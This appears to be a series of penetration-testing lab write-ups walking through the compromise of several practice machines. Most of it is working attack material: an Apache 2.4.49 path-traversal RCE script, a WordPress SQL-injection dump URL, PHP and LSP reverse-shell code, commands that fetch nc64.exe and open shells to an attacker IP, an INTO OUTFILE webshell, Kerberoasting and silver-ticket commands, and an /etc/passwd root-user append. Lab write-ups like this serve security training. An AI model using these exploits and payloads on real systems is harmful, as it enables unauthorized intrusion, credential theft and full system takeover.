Nmap scan revaled port 1978 was in use.

share and exiftool

SMB Null enumeration was allowed and there was a share that included MouseServer.exe. Used exiftool -a -u MouseServer.exe and found out it was 1.8.2.5.

WiFi Mouse 1.8.3.2 exploit (CVE-2022-3218)

So some search revealed there was an application called WiFi Mouse and version below 1.8.3.2 is vulnerable to RCE.

I found https://www.exploit-db.com/exploits/51072 exploit and fixed some indetation errors then executed it.

To execute it I created a reverse shell with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LOCAL> LPORT=443 -f exe -o exp.exe

Then I got reverse shell.

nmap scan revealed apache 2.4.49 (apache http server 2.4.49)

searchsploit

I found an exploit using searchsploit.

# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage:  https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

I then executed it to get RCE.

Nmap revealed JAMES Remote Admin 2.3.2.

searchsploit

Using searchsploit I found https://www.exploit-db.com/exploits/50347 exploit and before executing I updated port values.

I then executed and once a user logged in I got a reverse shell.

How apache JAMES Remote Admin 2.3.2 exploit works

The classic remote code execution (RCE) exploit for Apache James 2.3.2 (CVE-2015-5205) abuses a directory traversal vulnerability to write an email containing your payload directly into a global system directory, usually /etc/bash_completion.d/.

Then when a user logs in or simply opens an interactive bash shell, scripts under /etc/bash_completion.d/ get executed.

wpscan revealed perfect-survey 1.5.1 was in use.

Exploit (CVE-2021-24762)

It was vulnerable to sql injeciton. All I had to do was to visit below URL with given payload to get users and passwords.

site.com/wp-admin/admin-ajax.php?action=get_question&question_id=1 union select 1,1,char(116,101,120,116),user_login,user_pass,0,0,null,null,null,null,null,null,null,null,null from wp_users

Hashcat

I used hashcat with mode 400 and cracked it.

RCE

Then I was able to login and get a reverse shell via custom plugin upload.

<?php

/**
* Plugin Name: Wordpress Reverse Shell
* Author: mto

*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/22 0>&1'")
?>

Nmap

Initial nmap scan revealed RDP and Remote Mouse ports were open.

Exploitation

Remote Mouse 3.008 RCE

Remote Mouse 3.008 was vulnerable to remote code execution by sending arbitary mouse signals. So some research revealed p0dalirius/RemoteMouse-3.008-Exploit which allows you to send any command you want.

• At first I transfered nc64.exe

  python RemoteMouse-3.008-Exploit.py -t 192.168.224.199 -c 'powershell iwr http://192.168.45.216/nc64.exe -outfile C:\ProgramData\nc64.exe' -v
  

• Then I executed it and obtained reverse shell

  python RemoteMouse-3.008-Exploit.py --target-ip 192.168.224.199 --cmd 'powershell -c "C:\ProgramData\nc64.exe 192.168.45.216 80 -e cmd.exe"' -v
  

• Ports other than port 80 was not working. So I had to use port 80.

Then I simply read local flag.

Privilege Escalation

FileZilla Password (recentservers.xml)

I executed WinPEAS.exe and found two available FileZilla files.

1. C:\Users\divine\AppData\Roaming\FileZilla\filezilla.xml → version etc.
2. C:\Users\divine\AppData\Roaming\FileZilla\recentservers.xml → session information, password etc.

I read both of them. I noted FileZilla version then read base64 encoded FileZilla password.

Then I decoded the password and RDP into same user we got reverse shell.

CVE-2021-35448

Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections.

This version of Remote Mouse was vulnerable to GUI based Privilege Escalation and as we have RDP session we could exploit this.

1. Open Remote Mouse from the system tray
2. Go to “Settings”
3. Click “Change…” in “Image Transfer Folder” section

1. “Save As” prompt will appear
2. Enter “C:\Windows\System32\cmd.exe” in the address bar and click enter

1. A new command prompt is spawned with SYSTEM privileges

Then I simply read Administrator flag.

Nmap

Initial nmap scan revealed common DC ports.

I added necessary domains to /etc/hosts file.

Web Enumeration

Website included many names.

Exploitation

User Enumeration

So using username-anarchy, I created a userList.

Then using kerbrute, I applied user enumeration and noted valid usernames.

Password Spraying

Later, I tried many techniques and non of them worked. Then I found that the website was created in 2023.

So using cewl I created wordlist then appended 2023 and 2023! at the end of each record using below command.

for i in $(cat password); do echo $i; echo ${i}2022; echo ${i}2023; echo ${i}\! ;done > pass.txt

Then I applied brute force using kerbrute and found valid credentials.

BloodHound

Then I executed bloodhound-python.

bloodhound-python -u 'andrea.hayes' -p 'Nagoya2023' -c all -ns 192.168.224.21 -d nagoya-industries.com --zip

And it revealed a path where I can apply force change password twice to get winRM shell.

I used below command to change user’s password.

net rpc password "CHRISTOPHER.LEWIS" "Test1234." -U "nagoya-industries.com"/"iain.white"%"Test1234." -S "192.168.224.21"

Then I obtained user flag and winrm shell.

Privilege Escalation

Kerberoasting

Later I applied kerberoasting using impacket-GetUserSPNs.

impacket-GetUserSPNs nagoya-industries.com/'CHRISTOPHER.LEWIS':'Test1234.' -request

And I was able to crack svc_mssql password.

MSSQL Service

At first I tried many methods but could not find anything useful. Then I found MSSQL service is up but unreachable from outside.

So I tried to exploit it locally with PowerUpSQL but I could not.

Later I set up ligolo-ng as shown below to reach local MSSQL service.

1. I set up an proxy

1. I executed the agent.exe

With that setup, I was able to login to mssql. But to login I change /etc/hosts to 240.0.0.1.

Silver Ticket

However, I had no permission, there were no links or no impersonation. So, as I am the service account I could exploit Silver Ticket to login MSSQL as administrator.

1. Generate NTLM hash for service account

1. Create an administrator ticket using impacket-ticketer

impacket-ticketer -nthash "E3A0168BC21CFB88B95C954A5B18F57C" -domain-sid "S-1-5-21-1969309164-1513403977-1686805993" -spn "MSSQL/nagoya.nagoya-industries.com"  -domain "nagoya-industries.com" -user-id 500 "Administrator"

1. Using KRB55CCNAME inject this ticket to obtain administrator MSSQL login.

KRB5CCNAME=Administrator.ccache impacket-mssqlclient -k nagoya.nagoya-industries.com

xp_cmdshell

Later, I simply executed xp_cmdshell to obtain reverse shell.

EXEC xp_cmdshell 'cmd /c C:\temp\nc64.exe 192.168.45.216 445 -e cmd.exe'

And I obtained the shell.

SeImpersonatePrivilege (GodPatato)

Then I downloaded GodPatato (BeichenDream/GodPotato) and executed it to obtain SYSTEM reverse shell.

I simply read Administrator flag.

Nmap

Initial nmap scan revealed SMB, MySQL and HTTP ports were open.

Website

Initial website was static website.

So I applied directory brute force and found /blog endpoint.

The website was redirecting us to monster.pg domain.

So I added it to /etc/hosts file.

The blog website was Monstra 3.0.4

Exploitation

Brute Force

At first I tried default credentials but non of them worked. Then I used cewl to create a wordlist.

cewl http://monster.pg/ > passlist

And then I applied hydra brute force and found password for admin user.

hydra -l admin -P passlist monster.pg http-post-form '/blog/admin/:login=^USER^&password=^PASS^&login_submit=Log+In:F=Wrong' -I -f -V

Monstra 3.0.4 RCE

Later I found this (https://github.com/monstra-cms/monstra/issues/470) github repository which explain how to abuse this version to get a reverse shell.

1. Log into the panel.
2. Go to “/monstra-3.0.4/admin/index.php?id=themes&action=edit_template&filename=blog”
3. Click edit Blog
4. Insert payload easy-simple-php-webshell.php
5. Reload page review code excution

So I used ivan-sincek/php-reverse-shell to create a reverse shell and updated IP and port values.

Later, I visited the created page blog which is located at /blog/blog and got a reverse shell.

Privilege Escalation

users.table.xml decryption

At first I found users.table.xml file located at C:\xampp\htdocs\blog\storage.

Then using an online purifier (https://jsonformatter.org/xml-formatter) I purified the XML output.

We already knew admin password but there was another user. While checking I found this post (https://simpleinfoseccom.wordpress.com/2018/05/27/monstra-cms-3-0-4-unauthenticated-user-credential-exposure/) which explain how passwords are stored in users.table.xml file.

To understand it even more I checked Security.php file under C:\xampp\htdocs\blog\engine and found encryption code.

/**
* Encrypt password
*
*  <code>
*      $encrypt_password = Security::encryptPassword('password');
*  </code>
*
* @param string $password Password to encrypt
*/

public static function encryptPassword($password)
{
    return md5(md5(trim($password) . MONSTRA_PASSWORD_SALT));
}

It was simply concataneting password and salt then applying MD5 twice. So I checked defines.php file under C:\xampp\htdocs\blog\boot which showed salt value.

/**
 * Set password salt
 */

define('MONSTRA_PASSWORD_SALT', 'YOUR_SALT_HERE');

So it was simply YOUR_SALT_HERE. I could now crack the passwords. I tried to crack it with rockyou.txt using hashcat with mode 2630 and it worked. I cracked it.

However, it was not useful because I already got mike shell and it was mike’s password.

CVE-2020-11107

An issue was discovered in XAMPP before 7.2.29, 7.3.x before 7.3.16 , and 7.4.x before 7.4.4 on Windows. An unprivileged user can change a .exe configuration in xampp-contol.ini for all users (including admins) to enable arbitrary command execution.

So later, I executed WinPEAS.exe and found I had write privileges over C:\xampp. Some research revealed there was a CVE assigned to it.

I found this repo (Mohnad-AL-saif/Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation) which explains this exploitation in detail.

At first I checked the version using type C:\xampp\properties.ini.

It was vulnerable. So I created a malicious executable using C and i686-w64-mingw32-gcc after transferring nc64.exe file.

#include <stdlib.h>

int main(void){
     system("C:\\ProgramData\\nc64.exe 192.168.45.216 445 -e cmd.exe");
    return 0;
} 

i686-w64-mingw32-gcc exp.c -l ws2_32 -o exp.exe

Then I created a temp folder using mkdir C:\temp and I transfered my malicious file to here using powershell iwr http://192.168.45.216/exp.exe -outfile C:\temp\msf.exe.

Then I created a powershell script to exploit this.

# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

Later I simply executed the ps1 payload using powershell -ExecutionPolicy Bypass -File exp.ps1 and started waiting.

After sometime I got administrator shell.

Nmap

Initial nmap scan revealed SMB, MySQL and HTTP 8000 ports were open.

Web Enumeration

Visiting the website revealed BarracudaDrive 6.5 was in use.

Exploitation

It was a similar website like FuguHub. So at first I created admin user.

Then from customize page, I updated about page to lsp reverse shell.

<?lsp if request:method() == "GET" then ?>
    <?lsp 
        local host, port = "<IP>", <PORT>
        local socket = require("socket")
        local tcp = socket.tcp()
        local io = require("io")
        local connection, err = tcp:connect(host, port)
        
        if not connection then
            print("Error connecting: " .. err)
            return
        end
        
        while true do
            local cmd, status, partial = tcp:receive()
            if status == "closed" or status == "timeout" then break end
            if cmd then
                local f = io.popen(cmd, "r")
                local s = f:read("*a")
                f:close()
                tcp:send(s)
            end
        end
        
        tcp:close()
    ?>
<?lsp else ?>
    Wrong request method, goodBye! 
<?lsp end ?>

Visiting the about page got me SYSTEM shell.

2nd way - Intended Way

Enumeration

Nmap also revealed two additional web ports were open.

Website at port 45332 was simple website that had no input points.

Directory brute force revealed phpinfo.php file.

I noted down the DOCUMENT_ROOT variable.

Other website at 33033 redirected us to user page. One of the users had a different description.

I could not login but there was a forgot password button. It required a reminder and I tried paranoid for the user and it worked. I logged in.

There was an experimental feature called request profile slug.

So I tested SQL injection there and it worked.

Exploitation

So I used INTO OUTFILE query to put a webshell to DOCUMENT_ROOT.

' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -'

And I was able to execute commands.

I transfered nc64.exe and executed it.

Then simply got a reverse shell.

Privilege Escalation

As we know BarracudaDrive 6.5 was in use which was vulnerable to Insecure Folder Permissions. I found an exploit description online (https://www.exploit-db.com/exploits/48789).

All I had to do is replace C:\bd\bd.exe with a malicious file and execute shutdown /r /t 0 to reboot.

So at first I created a malicious C file and compiled it with i686-w64-mingw32-gcc.

#include <stdlib.h>

int main(void){
     system("C:\\xampp\\htdocs\\nc64.exe 192.168.45.167 445 -e cmd.exe");
    return 0;
}

i686-w64-mingw32-gcc exp.c -l ws2_32 -o bd.exe

Then I moved normal bd.exe to bd.exe.bat and transfered malicious file.

Then set a nc reverse shell listener and rebooted the machine.

After some time, I got a SYSTEM shell.

Nmap

Initial nmap scan revealed SSH, HTTP and some mail ports were open.

Web Enumeration

Visiting the website revealed it was CS-Cart website.

Later, I searched how to find CS-Cart version and found this post (https://forum.cs-cart.com/t/how-to-find-my-cs-cart-version/13327) which explains all you need to do is add ?version to your website like this http://test.com/?version. So I did it and found out it was CS-Cart 1.3.3.

Exploitation

CS-Cart 1.3.3 LFI

This version was vulnerable to LFI via below URL.

http://<IP>/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

So I simply searched it and found out there was a user named patrick.

CS-Cart 1.3.3 RCE

This version was also vulnerable to malicious file upload leading to RCE. I found an exploit reatva/CS-Cart-1.3.3-RCE. It needed admin login so at first I tried to login admin page. I only used default admin:admin credentials and it worked.

Later, I simply executed the exploit and got reverse shell as www-data.

And I read the user flag.

Privilege Escalation

default credentials and sudo ALL

Later, I tried many methods but non of them worked. This was an old system and I could not execute anything.

I then tried default credentials patrick:patrick and it worked. Moreover, calling sudo -l revealed I could run ALL commands as sudo. So I simply executed sudo bash and got root.

Nmap

Initial nmap scan revealed SSH and HTTP ports were open.

Web Enumeration

Website was Simple PHP Photo Gallery 0.8.

I then searched for some exploits and found there was LFI and RFI vulnerabilities for version 0.7. Nevertheless, I wanted to try it.

site.com/image.php?img= [ PAYLOAD ]

At first I applied directory brute forcing to be sure there are image.php or other endpoints.

Exploitation

LFI and RFI

Then I tried LFI and it worked. I saw there was a user named michael.

Then I tried RFI and it also worked.

So I downloaded pentestmonkey/php-reverse-shell and updated port and ip values. I also saved it as txt file.

Then I visited the website and got reverse shell.

db.php

There was a file named db.php under web root. I checked it and found mysql root password. And I logged in to mysql.

Then I enumerated usernames and found base64 encoded user passwords.

Then I decoded it and logged in to SSH as michael.

Privilege Escalation

writeable passwd

I executed linpeas.sh and found that I could overwrite /etc/passwd.

So I executed below command to add a user r00t:password. And I switched to that user and read root flag.

pw=$(openssl passwd password); echo "r00t:${pw}:0:0:root:/root:/bin/bash" >> /etc/passwd